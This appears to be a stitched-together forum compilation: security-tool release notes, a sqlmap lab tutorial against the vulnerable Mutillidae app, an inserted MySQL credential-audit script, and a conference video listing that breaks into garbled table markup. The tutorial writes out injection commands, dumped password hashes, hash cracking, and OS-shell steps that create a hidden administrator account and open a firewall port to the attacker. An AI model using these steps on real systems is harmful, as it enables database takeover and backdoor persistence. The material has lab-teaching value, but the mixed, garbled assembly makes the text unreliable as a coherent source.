- All file output goes to a single directory (same file names as in previous versions) instead of to the working local directory.
- Change in the date format used for log files. From: 2011-12-30_105055 – To: 20111230-105055
- Test if SSL/TLS renegotiation is enabled (NEW check) and if the target service supports secure renegotiation (already in previous versions). If secure renegotiation is not supported, we must check renegotiation by using legacy renegotiation (two new log files are used).
- New test to check for legacy renegotiation even when secure renegotiation is supported, just in case the target service supports both.
- Test if client certificate authentication is required by the target service. If so, identify the number of CAs accepted and save the list of CAs to a file.
- New test to check for HTTP headers using HTTP/1.0 (previous versions) as well as HTTP/1.1 and a valid Host header. New log files created for this.
- New error handling code for the initial SSL/TLS verification.
- Optimizations in the openssl delays (sleep timers). New DELAY variable to control sleep timers (by default 3 seconds; it was 5 before).
- New output indentation.
- New output code set for findings: – (negative), + (positive), . (info), * (group of checks) or ! (error/warning).
- LOGFILE changed to SSLSCANLOGFILE & ERRFILE changed to SSLSCANERRFILE.
- RENEGLEGACY???FILE(s) included in the final listing and removal process.
- Several changes to the output messages for the different findings.
- Duplication of "Preferred Server Cipher" output message removed.
- New check to test for RC4 in the preferred cipher(s) regarding BEAST.
- Use of openssl "-prexit" option for some weird target scenarios (CSA).
- Added the date and time at the beginning of the output.

This version has been tested on updated versions of Samurai WTF 2.0 (running openssl 1.0.1 and sslscan 1.8.2), Backtrack5 R3 (running openssl 0.9.8k and sslscan 1.8.2), and Mac OS X Mountain Lion 10.8.x (running openssl 0.9.8r and sslscan 1.8.2). Samurai WTF 2.0 is the only one of these three that includes openssl v1.0.x by default, providing support for the TLS v1.1 and v1.2 protocol tests.

Download TLSSLed: TLSSLed v1.3 – TLSSLed_v1.3.sh

Source: TLSSLed v1.3! — PenTestIT
-
[h=1]Mobius Forensic Toolkit 0.5.16[/h]
by Mayuresh on February 6, 2013

Mobius Forensic Toolkit is being continuously developed and it has recently been updated! The bug-fix release is Mobius Forensic Toolkit version 0.5.16.

"Mobius Forensic Toolkit is a forensic framework written in Python/GTK that manages cases and case items, providing an abstract interface for developing extensions. Cases and item categories are defined using XML files for easy integration with other tools."

[h=2]Official release notes for Mobius Forensic Toolkit 0.5.16:[/h]
This release features the Turing extension, an extension to handle cryptographic services. It is fully integrated with the Hive (registry) extension, so that when registry files are opened, it automatically records the user account password hashes and tests keywords such as LSA secrets, e-mail passwords, and Internet Explorer Autocomplete, among others. All hashes and passwords found are stored in an SQLite database. The Turing extension exports and imports to/from John The Ripper .pot files and to John The Ripper hash files.

[h=3]Download Mobius Forensic Toolkit:[/h]
Mobius Forensic Toolkit 0.5.16 – mobiusft-0.5.16.tar.gz / mobiusft-0.5.16.tar.bz2 / mobiusft / mobiusft-0.5.16.zip

Source: Mobius Forensic Toolkit 0.5.16! — PenTestIT
-
[h=1]NOWASP Mutillidae 2.4.3[/h]
by Mayuresh on February 6, 2013

Our first post regarding NOWASP (Codename Mutillidae) can be found here. Recently an update – NOWASP (Codename Mutillidae) version 2.4.3 – was released. This release comes with a new sqlmap target page with hints & links (Menu -> SQLi -> SQLMap Targets) and lots of bug fixes.

"NOWASP (Mutillidae) is a free, open source web application provided to allow security enthusiasts to pen-test a web application. NOWASP (Mutillidae) can be installed on Linux, Windows XP, and Windows 7 using XAMPP, making it easy for users who do not want to administrate a webserver. It is already installed on SamuraiWTF and Rapid7 Metasploitable-2. The existing version can be updated on either. Containing dozens of vulns and hints to help the user, this is an easy-to-use web hacking environment deliberately designed for labs, security enthusiasts, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web sec training courses, and as an "assess the assessor" target for vulnerability assessment software."

[h=2]Official NOWASP (Mutillidae) change log:[/h]
- Added login.php page to the sqlmap targets in the menu
- Modified several links to open in new windows/tabs rather than taking over main screen
- Reduced some unneeded styles
- Added links for Firefox add-ons to home page
- Added link for sqlmap to home page
- Added new page with SQLMap practice targets, link to video, and new hints section

[h=3]Download NOWASP (Mutillidae)[/h]
NOWASP Mutillidae 2.4.3 – LATEST-mutillidae-2.4.3.zip

Source: NOWASP Mutillidae 2.4.3! — PenTestIT
-
[h=1]SQLNinja 0.2.999-alpha1[/h]
by Mayuresh on February 6, 2013

We finally have a SQLNinja update! We first covered the awesome tool here! We now have SQLNinja version 0.2.999-alpha1! This is the first alpha of the new release, with all the newest cool stuff like data extraction via WAITFOR and DNS tunnel, plus vbscript-based upload!

"Sqlninja is an exploitation tool to be used against web apps based on MS SQL Server that are vulnerable to SQL Injection attacks, in order to get a shell also in very hostile conditions. Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered."

[h=2]Change log for SQLNinja 0.2.999-alpha1:[/h]
- Added data extraction module
- Added vbscript-based upload
- Split big ugly script into modules
- Lots of refactoring

[h=3]Download SQLNinja 0.2.999-alpha1:[/h]
SQLNinja 0.2.999-alpha1 – sqlninja-0.2.999-alpha1.tgz

Source: SQLNinja version 0.2.999-alpha1! — PenTestIT
-
[h=1]WAppEx 2.0![/h]
by Mayuresh on February 6, 2013

Our first post about WAppEx can be found here. Recently, an update – WAppEx 2.0 – was made available! This release is a huge leap from the previous one (version 1.0) and as such has been given a major version increment. It is nothing short of a total remake of the whole software! In favour of greater extensibility and flexibility, WAppEx 2.0 has all the exploitation logic moved to a core exploit database. The full-fledged exploit database not only provides the good old exploits with a lot of new features, but also stands for sharing, updating, extending and more. The database is rich with new payloads, and major improvements have been made to the existing payloads and exploits. Now you can unleash massive security tests by executing a batch test of multiple exploits against multiple targets, all in one single action. The Test-on-Targets feature automates much of the tasks you would have had to do manually in the previous version. Still, in addition to all this, a shining toolbox of new tools has been added to the suite. Some of the new tools added are Manual Request, Dork Finder, Exploit Editor, Hidden File Checker, and Neighbor Site Finder!

"WAppEx is an integrated Web Application security assessment and exploitation platform designed with the whole spectrum of security professionals to web application hobbyists in mind. It suggests a security assessment model which revolves around an extensible exploit database. Further, it complements the power with various tools required to perform all stages of a web application attack."

[h=2]Changes made to WAppEx 2.0:[/h]
- Auto-detect feature deleted from exploits
- Browser tool deleted
- Exploits and payloads view changed
- Exploit Database with the following features added:
  - New script syntax and structure
  - Searching, selecting, and executing exploits
  - Add/remove database entries (exploits or payloads)
  - Add exploits or payloads to the database using either the Exploit Wizard or the script file
  - Batch testing of multiple targets against multiple exploits
  - Execute multiple instances of one or more payloads (for every running exploit) simultaneously
- Following tools added:
  - Manual Request
  - Dork Finder
  - Exploit Editor
  - Hidden File Checker
  - Neighbor Site Finder
- Local File Inclusion analyzer script updated
- 24 new payloads for LFI, RFI, and PHP Code Execution vulnerabilities added:
  - Directory Explorer
  - CodeExec Bind
  - 3 connect-back shells
  - Code Execution
  - MySQL Dump
  - ServerInfo
  - 4 command execution payloads
- Bug-fixes:
  - Find Login Page crashed on start
  - Problem with software registration
  - Stop button did not work when retrieving data from SQL server
  - Problem with saving SQL results
  - Crashed when closing Find Login Page
  - Status icons were not displayed properly in exploit tabs

[h=3]Download WAppEx:[/h]
WAppEX 2.0 – WAppEx2.0.exe

Source: WAppEx version 2.0! — PenTestIT
-
[h=1]Sleuth Kit 4.0.2![/h]
by Mayuresh on February 6, 2013

Two days ago, The Sleuth Kit was updated! We now have The Sleuth Kit version 4.0.2. Our first post about The Sleuth Kit or TSK can be found here. This release has bug fixes and some new minor features.

"The Sleuth Kit (TSK) is a library and collection of command line tools that allow you to investigate volume and file system data. It is a collection of open source file system forensics tools that allow one to view allocated and deleted data from NTFS, FAT, FFS, and EXT2FS images. The Autopsy Forensic Browser provides a graphical interface to The Sleuth Kit. The Sleuth Kit is an open source forensic toolkit for analyzing Microsoft and UNIX file systems and disks. The Sleuth Kit enables investigators to identify and recover evidence from images acquired during incident response or from live systems. The Sleuth Kit is open source, which allows investigators to verify the actions of the tool or customize it to specific needs."

[h=2]Official change log for The Sleuth Kit:[/h]
New Features in Core:
- fiwalk is now included.

Bug Fixes in Core:
- Fixed fcat to work on NTFS files (still doesn't support ADS though).
- Fixed HFS+ support in tsk_loaddb / SQLite — root directory was not added.
- NTFS code now looks at all MFT entries when listing directory contents. It used to only look at unallocated entries for orphan files. This fixes an image that had allocated files missing from the directory b-tree.
- NTFS code uses sequence number when searching MFT entries for all files.
- Libewf detection code change to support v2 API more reliably (ID: 3596212).
- NTFS $SII code could crash in rare cases if $SDS was a multiple of block size.

Framework:
- Added new API to TskImgDB that returns the base name of an image.
- Numerous performance improvements to framework.
- Removed requirement in framework to specify module extension in pipeline configuration file.
- Added blackboard artifacts to represent both operating system and network service user accounts.

Java Bindings:
- More methods to query files
- Methods to get current directory when being added to DB.
- Modified class structure a bit
- More lazy loading for children / parents.
- Better exception throwing from C++

[h=3]Download The Sleuth Kit:[/h]
The Sleuth Kit 4.0.2 – sleuthkit-win32-4.0.2.zip / sleuthkit-framework-win32-4.0.2.zip / sleuthkit-4.0.2.tar.gz

Source: The Sleuth Kit 4.0.2! — PenTestIT
-
Java SE Proof Of Concept Code - Packet Storm
-
[h=1]Video Tutorial: Basics of using sqlmap automated sql injection audit tool[/h]
Posted by webpwnized in Information Security on Feb 6, 2013 6:01:03 AM

Author: Jeremy Druin
Twitter: @webpwnized
YouTube Channel: webpwnized's channel - YouTube
Software required: Backtrack 5 R3 with sqlmap, Mutillidae Web Pen Test Training Environment (hxxp://sourceforge.net/projects/mutillidae/files/mutillidae-project/)

Recorded at the ISSA Kentuckiana February 2013 Workshop, this video reviews the use of sqlmap, an automated sql injection audit tool. The video walks through using sqlmap to locate an sql injection, determine the backend database type, enumerate the database account, databases, schema, tables, columns and password hashes, then use the database to compromise the Windows host. Dumping data, arguably the primary use of sqlmap, is covered only briefly since there are large amounts of documentation on this feature already.

Environment

The environment is a Backtrack 5 R3 "attacker" at IP 192.168.56.101 and a Windows XP "victim" at 192.168.56.102 running as virtual machines on Oracle VirtualBox. The Windows XP host is running XAMPP on which Mutillidae is installed. Mutillidae may also be installed on WAMPP or LAMP stacks, including being able to be installed on Linux. Using two hosts is not necessary to recreate the lab exercise. All of the items can be reproduced on "localhost". The database was created by installing XAMPP, unzipping the Mutillidae files into the C:\xampp\htdocs\ directory, then clicking the "Set up database" button in Mutillidae. Mutillidae has a deliberately vulnerable login page against which the sql injection was carried out.

Notes from Presentation

Please find notes from the talk below, which can be used to follow along with the video.
--------------------------------------------------
Running SQLMAP Help
--------------------------------------------------
--help    Help
-hh       Double the help

--------------------------------------------------
Running SQLMAP "Manually"
--------------------------------------------------
./sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php" --data="username=asdf&password=asdf&login-php-submit-button=Login" --banner

--------------------------------------------------
Capturing Request To Pass To SQLMAP
--------------------------------------------------
URL: http://192.168.56.102/mutillidae/index.php?page=login.php

Request:
POST /mutillidae/index.php?page=login.php HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.56.102/mutillidae/index.php?page=login.php
Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

username=asdf&password=asdf&login-php-submit-button=Login

--------------------------------------------------
Running SQLMAP with "auto-parse"
--------------------------------------------------
./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options>

--------------------------------------------------
Running SQLMAP with various features
--------------------------------------------------
./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options>

--banner
  web server operating system: Windows
  web application technology: PHP 5.4.4, Apache 2.4.2
  back-end DBMS: MySQL 5.0
  banner: '5.5.25a'

--fingerprint
  web server operating system: Windows
  web application technology: PHP 5.4.4, Apache 2.4.2
  back-end DBMS: active fingerprint: MySQL >= 5.5.0

--current-user    Retrieve DBMS current user
--current-db      Retrieve DBMS current database
--hostname        Retrieve DBMS server hostname
--is-dba          Detect if the DBMS current user is DBA
  current user: 'root@localhost'
  current database: 'nowasp'
  current user is DBA: True
  hostname: 'mutillid-7se1xr'

--users           Enumerate DBMS users
--passwords       Enumerate DBMS users password hashes
  database management system users
  [*] ''@'localhost'
  [*] 'pma'@'localhost'
  [*] 'root'@'linux'
  [*] 'root'@'localhost'

--dbs             Enumerate DBMS databases
  available databases [10]:
  [*] cdcol
  [*] information_schema
  [*] mysql
  [*] nowasp
  [*] owasp10
  [*] owasp13
  [*] performance_schema
  [*] phpmyadmin
  [*] test
  [*] webauth

--------------------------------------------------
Enumerate DBMS database tables, columns, structure (schema)
--------------------------------------------------
--tables          Enumerate DBMS database tables
--columns         Enumerate DBMS database table columns
--schema          Enumerate DBMS schema
--count           Retrieve number of entries for table(s)
--exclude-sysdbs  Exclude DBMS system databases when enumerating tables
-D DB             DBMS database to enumerate
-T TBL            DBMS database table to enumerate
-C COL            DBMS database table column to enumerate
-U USER           DBMS user to enumerate

--------------------------------------------------
Extracting data
--------------------------------------------------
--dump            Dump DBMS database table entries
--dump-all        Dump all DBMS databases tables entries
-D DB             DBMS database to enumerate
-T TBL            DBMS database table to enumerate
-C COL            DBMS database table column to enumerate
-U USER           DBMS user to enumerate
--exclude-sysdbs  Exclude DBMS system databases when enumerating tables
--start=LIMITSTART  First query output entry to retrieve
--stop=LIMITSTOP    Last query output entry to retrieve
--sql-query=QUERY   SQL statement to be executed
--sql-shell         Prompt for an interactive SQL shell

--------------------------------------------------
Listing columns from tables
--------------------------------------------------
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --columns
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --common-columns
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select column_name from information_schema.columns where table_name = 'user'"

select column_name from information_schema.columns where table_name = 'user' [42]:
[*] Alter_priv [*] Alter_routine_priv [*] authentication_string [*] Create_priv [*] Create_routine_priv [*] Create_tablespace_priv [*] Create_tmp_table_priv [*] Create_user_priv [*] Create_view_priv [*] Delete_priv [*] Drop_priv [*] Event_priv [*] Execute_priv [*] File_priv [*] Grant_priv [*] Host [*] Index_priv [*] Insert_priv [*] Lock_tables_priv [*] max_connections [*] max_questions [*] max_updates [*] max_user_connections [*] Password [*] plugin [*] Process_priv [*] References_priv [*] Reload_priv [*] Repl_client_priv [*] Repl_slave_priv [*] Select_priv [*] Show_db_priv [*] Show_view_priv [*] Shutdown_priv [*] ssl_cipher [*] ssl_type [*] Super_priv [*] Trigger_priv [*] Update_priv [*] User [*] x509_issuer [*] x509_subject

--------------------------------------------------
Advanced: Modifying injections
--------------------------------------------------
SELECT * FROM accounts WHERE username='' AND password='''

./sqlmap.py -r ~/engagements/sqlmap/login.php.request --prefix="SELECT * FROM accounts WHERE username='" --suffix="'-- " --banner

--prefix=PREFIX   Injection payload prefix string
--suffix=SUFFIX   Injection payload suffix string

--------------------------------------------------
Advanced: Dealing with inconsistent results
--------------------------------------------------
select User, Password from mysql.user

versus

./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select User, Password from mysql.user order by User desc"

select User, Password from mysql.user order by User desc

select User, Password, Host, authentication_string from mysql.user order by User desc [9]:
[*] root, , localhost,
[*] root, , linux,
[*] pma, , localhost,
[*] Simba, *F43B942A34347297C3B0455DAB190AFB9BBF13B5, localhost,
[*] Rocky, *2BA8DF85753BE61F6C72A8784B11E68A41878032, localhost,
[*] Patches, *2027D9391E714343187E07ACB41AE8925F30737E, localhost,
[*] Happy, *160E7D8EE3A97BED0F0AD1563BFB619178D15D7B, localhost,
[*] , , localhost,
[*] , , linux,

--------------------------------------------------
Cracking MySQL Password Hashes
--------------------------------------------------
John the Ripper Command Line
/pentest/passwords/john/john --format=mysql-sha1 /tmp/mysql.hashes

Password Hashes in MySQL Format
Simba:*F43B942A34347297C3B0455DAB190AFB9BBF13B5
Rocky:*2BA8DF85753BE61F6C72A8784B11E68A41878032
Patches:*2027D9391E714343187E07ACB41AE8925F30737E
Happy:*160E7D8EE3A97BED0F0AD1563BFB619178D15D7B

--------------------------------------------------
Understanding sqlmap O/S Shell
--------------------------------------------------
View transaction: tcpdump -i eth1 -vvv -X

1st Stage Uploader
2nd Stage Command Shell Page

sc query state= all
sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr
net user root toor /add
net localgroup TelnetClients /add
net localgroup Administrators root /add
net localgroup TelnetClients root /add
netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=192.168.56.101

--------------------------------------------------
Interacting Directly with sqlmap O/S Shell Backdoor
--------------------------------------------------
http://192.168.56.102/<temp file name>?cmd=ping%20192.168.56.101

--------------------------------------------------
Direct connection to the database
--------------------------------------------------
Installing Py-MySQL Dependency
git clone https://github.com/petehunt/PyMySQL/
cd PyMySQL
python setup.py install
cd ..
rm -rf PyMySQL

./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10

Source: https://community.rapid7.com/community/infosec/blog/2013/02/06/video-tutorial-basics-of-using-sqlmap-automated-sql-injection-audit-tool
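The mysql.user listing the notes extract (root with an empty password, an anonymous account, root reachable from a non-local host, `*`-prefixed hashes that john's mysql-sha1 format consumes) is exactly what a DBA should be auditing before an assessment finds it. The script below is an added example, not part of the original post or of sqlmap: it parses rows in the format sqlmap prints, reproduces MySQL's 4.1+ PASSWORD() scheme (SHA1 applied twice, upper-case hex with a leading `*`) and flags empty, anonymous, well-known-weak and remotely reachable root accounts. The sample rows, user names, hashes and the deny-list are constructed for the example.

```python
"""Audit a mysql.user listing for weak credentials.

Added example, not part of the original post or of sqlmap. It parses rows in
the format sqlmap prints for
  --sql-query="select User, Password, Host, authentication_string from mysql.user"
and flags what a DBA should fix: empty passwords, anonymous accounts, hashes of
well-known weak passwords, pre-4.1 hashes and root reachable from remote hosts.
"""
import hashlib
import re

# One sqlmap output row: "[*] User, Password, Host, authentication_string"
ROW_RE = re.compile(
    r"^\[\*\]\s*(?P<user>[^,]*),\s*(?P<password>[^,]*),\s*(?P<host>[^,]*),\s*(?P<auth>.*)$"
)

# Short deny-list (constructed); a real audit would load a larger wordlist.
WEAK_CANDIDATES = ("password", "root", "toor", "123456", "mysql", "admin")


def mysql_native_hash(password: str) -> str:
    """Reproduce MySQL 4.1+ PASSWORD(): '*' + hex(SHA1(SHA1(pw))), upper case.

    This is the format john --format=mysql-sha1 consumes; computing it here
    lets the audit compare mysql.user rows against known-weak candidates
    without any cracking tool.
    """
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def parse_rows(text: str) -> list:
    """Turn sqlmap's '[*] a, b, c, d' rows into dicts; other lines are ignored."""
    accounts = []
    for line in text.splitlines():
        match = ROW_RE.match(line.strip())
        if match:
            accounts.append({k: v.strip() for k, v in match.groupdict().items()})
    return accounts


def audit_accounts(accounts, candidates=WEAK_CANDIDATES):
    """Return (account, finding) pairs for every weak setting detected."""
    weak_by_hash = {mysql_native_hash(c): c for c in candidates}
    findings = []
    for acc in accounts:
        label = "'%s'@'%s'" % (acc["user"], acc["host"])
        pw = acc["password"]
        if acc["user"] == "":
            findings.append((label, "anonymous account"))
        if pw == "" and acc["auth"] == "":
            findings.append((label, "empty password"))
        elif pw in weak_by_hash:
            findings.append((label, "weak password '%s'" % weak_by_hash[pw]))
        elif pw and not pw.startswith("*"):
            # 16-hex-char pre-4.1 hash: far weaker than the SHA1 scheme
            findings.append((label, "pre-4.1 (old_passwords) hash"))
        if acc["user"] == "root" and acc["host"] not in ("localhost", "127.0.0.1", "::1"):
            findings.append((label, "root allowed from non-local host"))
    return findings


# Constructed sample in the page's output format (names and hashes are not the
# tutorial's). 'webapp' carries the well-known PASSWORD('password') hash.
SAMPLE_ROWS = "\n".join([
    "select User, Password, Host, authentication_string from mysql.user [6]:",
    "[*] root, , localhost,",
    "[*] root, , linux,",
    "[*] pma, , localhost,",
    "[*] webapp, *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19, localhost,",
    "[*] backup, %s, localhost," % mysql_native_hash("correct horse battery staple"),
    "[*] , , localhost,",
])

if __name__ == "__main__":
    for label, finding in audit_accounts(parse_rows(SAMPLE_ROWS)):
        print("%-22s %s" % (label, finding))
```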
-
Linux.conf.au 2013 Videos

We've released these videos as quickly as possible so that people can enjoy the many great talks at LCA this year, and so we can get our rendering gear out of the venue. We know some of these may have problems, but most of them are working and tested. Please let us know if there's anything that is mistitled, short or otherwise incorrect and we'll deal with it as soon as possible.

Helpful debugging information: if the closing screen (the balloons over old Parliament House) doesn't show at the end of the talk, then the file was partly rendered but the render machine probably locked up. If the closing screen shows but the talk was incomplete, then some parts of the talk may be missing, or we might simply have mistakenly unselected one of the raw video files. The former case is easily recoverable; the latter may be impossible to fix without a time machine but may also be recoverable. Let us know either way.

Things we can't fix: Sir Tim Berners-Lee's keynote on Friday and DSD and Open Source on Wednesday. We don't have permission to record the video for those talks. Sorry, if you weren't there, you've missed it.

Videos we know have problems:
- Bdale Garbee's Keynote on Monday - missing. Unfortunately our video capture system failed on us and we captured this on four DV tapes. I've got the 32GB of video of this on a hard disk, and I've cut together a full video in PiTiVi but it seems to refuse to render it. I will be trying Cinelerra to see if that works, or if restarting my PiTiVi project from scratch fixes it. This is a long job and will have to wait for the moment - Paul, 5/2/13.
- Miniconf videos. These were captured and are on file but the schedule in the video processing system is out of date. I'm going to try importing the latest schedule and seeing if that fixes it without also breaking every other talk. If not, I'll recreate the schedule by hand - Paul, 5/2/13.
- Ain't No Party Like A Unix Party - mislabeled talk (thanks Tim Suess). Daniel Black notes that this might be mislabeled as 'Touch And Go - Modern User Interfaces Using Open Source'. This is probably a schedule mismatch and hopefully an easy fix - Paul, 5/2/13.
- Why Kernel space sucks - audio drops at end (thanks Neil Brown). This is probably unrecoverable but I'll review it - Paul, 5/2/13.
- Bufferbloat from a Plumber's point of view (mp4) - only the end of the talk (thanks Dave Taht and Andrew McDonnell). This may be a missing or incorrectly skipped DV file - will review - Paul, 5/2/13.
- The future of nonvolatile memory (ogv) - truncated (thanks Neil Brown). Probably one of the render nodes locked up during rendering - will re-render - Paul, 5/2/13.
- High Speed Data Acquisition - missing (thanks Andrew McDonnell). I know we have this talk, I'm just not sure why it hasn't been rendered - will fix - Paul, 5/2/13.
- Copyright's Dark Clouds - Optus v NRL (ogv), Free and Open Source Software and Activism (ogv), Openstack on Openstack - a single management API for all your servers (ogv and mp4), and Using open source in over 1100 schools in New Zealand (ogv) - all truncated (thanks Ambrose Andrews, Robert Collins and Daniel Bryant). These are definitely rendering errors and we'll rebuild them - Paul, 5/2/13.
- The IPocalypse 20 months later (mp4) and RealTime Response on Multicore Systems - It is bigger than I thought (mp4) - both shorter than expected (thanks Ashley Hull). Probably render node failure, will reprocess - Paul, 5/2/13.
- Linux Gaming At Last - Tuning Open Source Graphics Drivers for Valve Software (ogv) - seems to skip at about 0:12:39 and resolve the problem soon after (thanks Phil Ingram). This may have been a rendering issue, will reprocess to try and fix it - Paul, 6/2/13.

Thanks to everyone who's reported problems - it's not a perfect system, but check back here after Wednesday 6th February for updates. The overall response to getting the videos up quickly rather than perfectly has been very positive - thanks for your support!
Paul Wayper, AV Wrangler

File  Last modified  Size
3D_Printing_with_Repsnapper.mp4  02-Feb-2013 18:00  88M
15MW_and_3600_penguins_in_a_room_Supercomputing_at_ANU.mp4  03-Feb-2013 17:42  91M
A_New_Linux_Platform_Hardware_and_Software.mp4  03-Feb-2013 16:55  81M
After_Arduino.mp4  04-Feb-2013 10:13  66M
An_Introduction_to_Linux_IPC_Facilities.mp4  03-Feb-2013 12:21  260M
ArduSat_Open_Source_in_orbit.mp4  02-Feb-2013 19:21  86M
Beyond_Alt_Text_What_Every_Project_Should_Know_About_Accessibility.mp4  04-Feb-2013 09:45  58M
Big_and_Little_Endian_inside_out.mp4  04-Feb-2013 10:25  112M
Bufferbloat_from_a_Plumbers_point_of_view.mp4  02-Feb-2013 17:46  7.6M
Building_Persona_federated_and_privacysensitive_identity_for_the_Web.mp4  03-Feb-2013 17:41  23M
Building_a_free_software_telemetry_radio_system.mp4  02-Feb-2013 21:05  63M
Ceph_Managing_A_Distributed_Storage_System_At_Scale.mp4  03-Feb-2013 17:42  81M
Ceph_object_storage_block_storage_file_system_replication_massive_scalability_and_then_some.mp4  03-Feb-2013 16:18  155M
Checkpoint_and_Restore_are_we_there_yet.mp4  02-Feb-2013 18:51  48M
Code_up_your_own_video_conference_in_HTML5.mp4  02-Feb-2013 19:08  66M
Concurrent_Programming_with_the_Disruptor.mp4  02-Feb-2013 20:05  54M
Conference_Closing.mp4  03-Feb-2013 17:35  210M
Conference_Closing_Lightning_Talks.mp4  03-Feb-2013 17:20  124M
Copyrights_Dark_Clouds_Optus_v_NRL.mp4  02-Feb-2013 19:11  3.0M
Designing_a_Verifiable_and_Accessible_Electronic_Voting_System.mp4  02-Feb-2013 20:07  2.5M
Droids_that_talk_Pairing_Codec2_and_Android.mp4  04-Feb-2013 13:20  31M
Free_and_open_source_software_and_activism.mp4  04-Feb-2013 13:10  167K
Future_directions_for_the_X_Window_System.mp4  04-Feb-2013 09:45  87M
Geeks_rule_over_kings_the_Distributed_Democracy.mp4  02-Feb-2013 19:20  3.0M
Getting_older_Tips_tricks_for_designing_inclusive_open_source_user_interfaces.mp4  02-Feb-2013 18:48  31M
Git_For_Ages_4_And_Up.mp4  02-Feb-2013 22:52  342M
Git_not_just_for_source_code_anymore.mp4  02-Feb-2013 20:29  74M
Graphics_from_Gamepads_Guitars_and_Gadgets_Galore.mp4  03-Feb-2013 18:12  83M
HEADER.html  06-Feb-2013 11:05  4.4K
Heat_Orchestrating_multiple_cloud_applications_on_OpenStack_using_templates.mp4  03-Feb-2013 16:38  87M
How_Mozilla_draws_the_line_between_configuration_and_data_while_using_configuration_management_tools.mp4  04-Feb-2013 09:27  69M
How_to_Fix_a_Font.mp4  03-Feb-2013 00:15  77M
How_to_make_almost_anything_go_faster.mp4  03-Feb-2013 00:02  51M
How_to_use_Puppet_like_an_Adult.mp4  03-Feb-2013 11:56  85M
Keynote_Andrew_Bunnie_Huang.mp4  03-Feb-2013 01:37  77M
Keynote_Radia_Perlman.mp4  03-Feb-2013 11:33  117M
LTTng_20_Advanced_Linux_tracing_for_everyone.mp4  04-Feb-2013 12:19  86M
Lighting_up_OpenCV_with_Ne10_and_NEON.mp4  04-Feb-2013 09:34  56M
Linux_Gaming_at_Last_Tuning_Open_Source_Graphics_Drivers_for_Valve_Software.mp4  02-Feb-2013 20:19  35M
Main_conference_opening.mp4  02-Feb-2013 17:57  84M
Make_your_software_understand_your_nonUS_accent.mp4  02-Feb-2013 19:08  58M
Making_Mobile_Communications_Secure.mp4  04-Feb-2013 11:05  116M
Making_RCU_Respect_Your_Devices_Battery_Lifetime.mp4  02-Feb-2013 19:34  71M
Making_UEFI_Secure_boot_work_for_you.mp4  02-Feb-2013 21:02  79M
Maximum_Clojure_Performance.mp4  02-Feb-2013 21:04  71M
Measuring_and_Improving_OpenGL_Performance.mp4  02-Feb-2013 22:03  59M
MySQL_in_the_cloud_as_a_service.mp4  03-Feb-2013 17:17  166M
NetFPGA_USB_2_interface.mp4  02-Feb-2013 22:40  148M
NovaProva_or_How_I_Did_Six_Impossible_Things_Before_LCA.mp4  03-Feb-2013 16:41  97M
OWASP_Developer_Guide_2013_what_it_means_for_open_source_projects.mp4  04-Feb-2013 12:24
[TD=align: right] 81M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]OpenStack_Zuul.mp4[/TD] [TD=align: right]04-Feb-2013 09:53 [/TD] [TD=align: right] 78M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_Digital_Radio.mp4[/TD] [TD=align: right]03-Feb-2013 00:06 [/TD] [TD=align: right] 79M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_Firmware.mp4[/TD] [TD=align: right]04-Feb-2013 13:05 [/TD] [TD=align: right] 47M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_and_Open_Data_for_Humanitarian_Response_with_OpenStreetMap.mp4[/TD] [TD=align: right]03-Feb-2013 00:03 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Openstack_on_Openstack_a_single_management_API_for_all_your_servers.mp4[/TD] [TD=align: right]04-Feb-2013 09:17 [/TD] [TD=align: right]1.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Playing_with_OpenStack_Swift.mp4[/TD] [TD=align: right]03-Feb-2013 11:57 [/TD] [TD=align: right] 95M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ponies_and_Rainbows_Clutter_20_and_GTK_40.mp4[/TD] [TD=align: right]03-Feb-2013 17:44 [/TD] [TD=align: right]106M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]PostgreSQL_92_Full_Throttle_Database.mp4[/TD] [TD=align: right]03-Feb-2013 16:09 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Pre_dinner_thingy_robert_llewellyn_and_simon_hackett.mp4[/TD] [TD=align: right]03-Feb-2013 16:42 [/TD] [TD=align: right] 93M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Quantitative_community_management.mp4[/TD] [TD=align: right]03-Feb-2013 16:07 [/TD] [TD=align: right] 99M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Quiltwork_patch_deployment_in_nz_and_au.mp4[/TD] [TD=align: 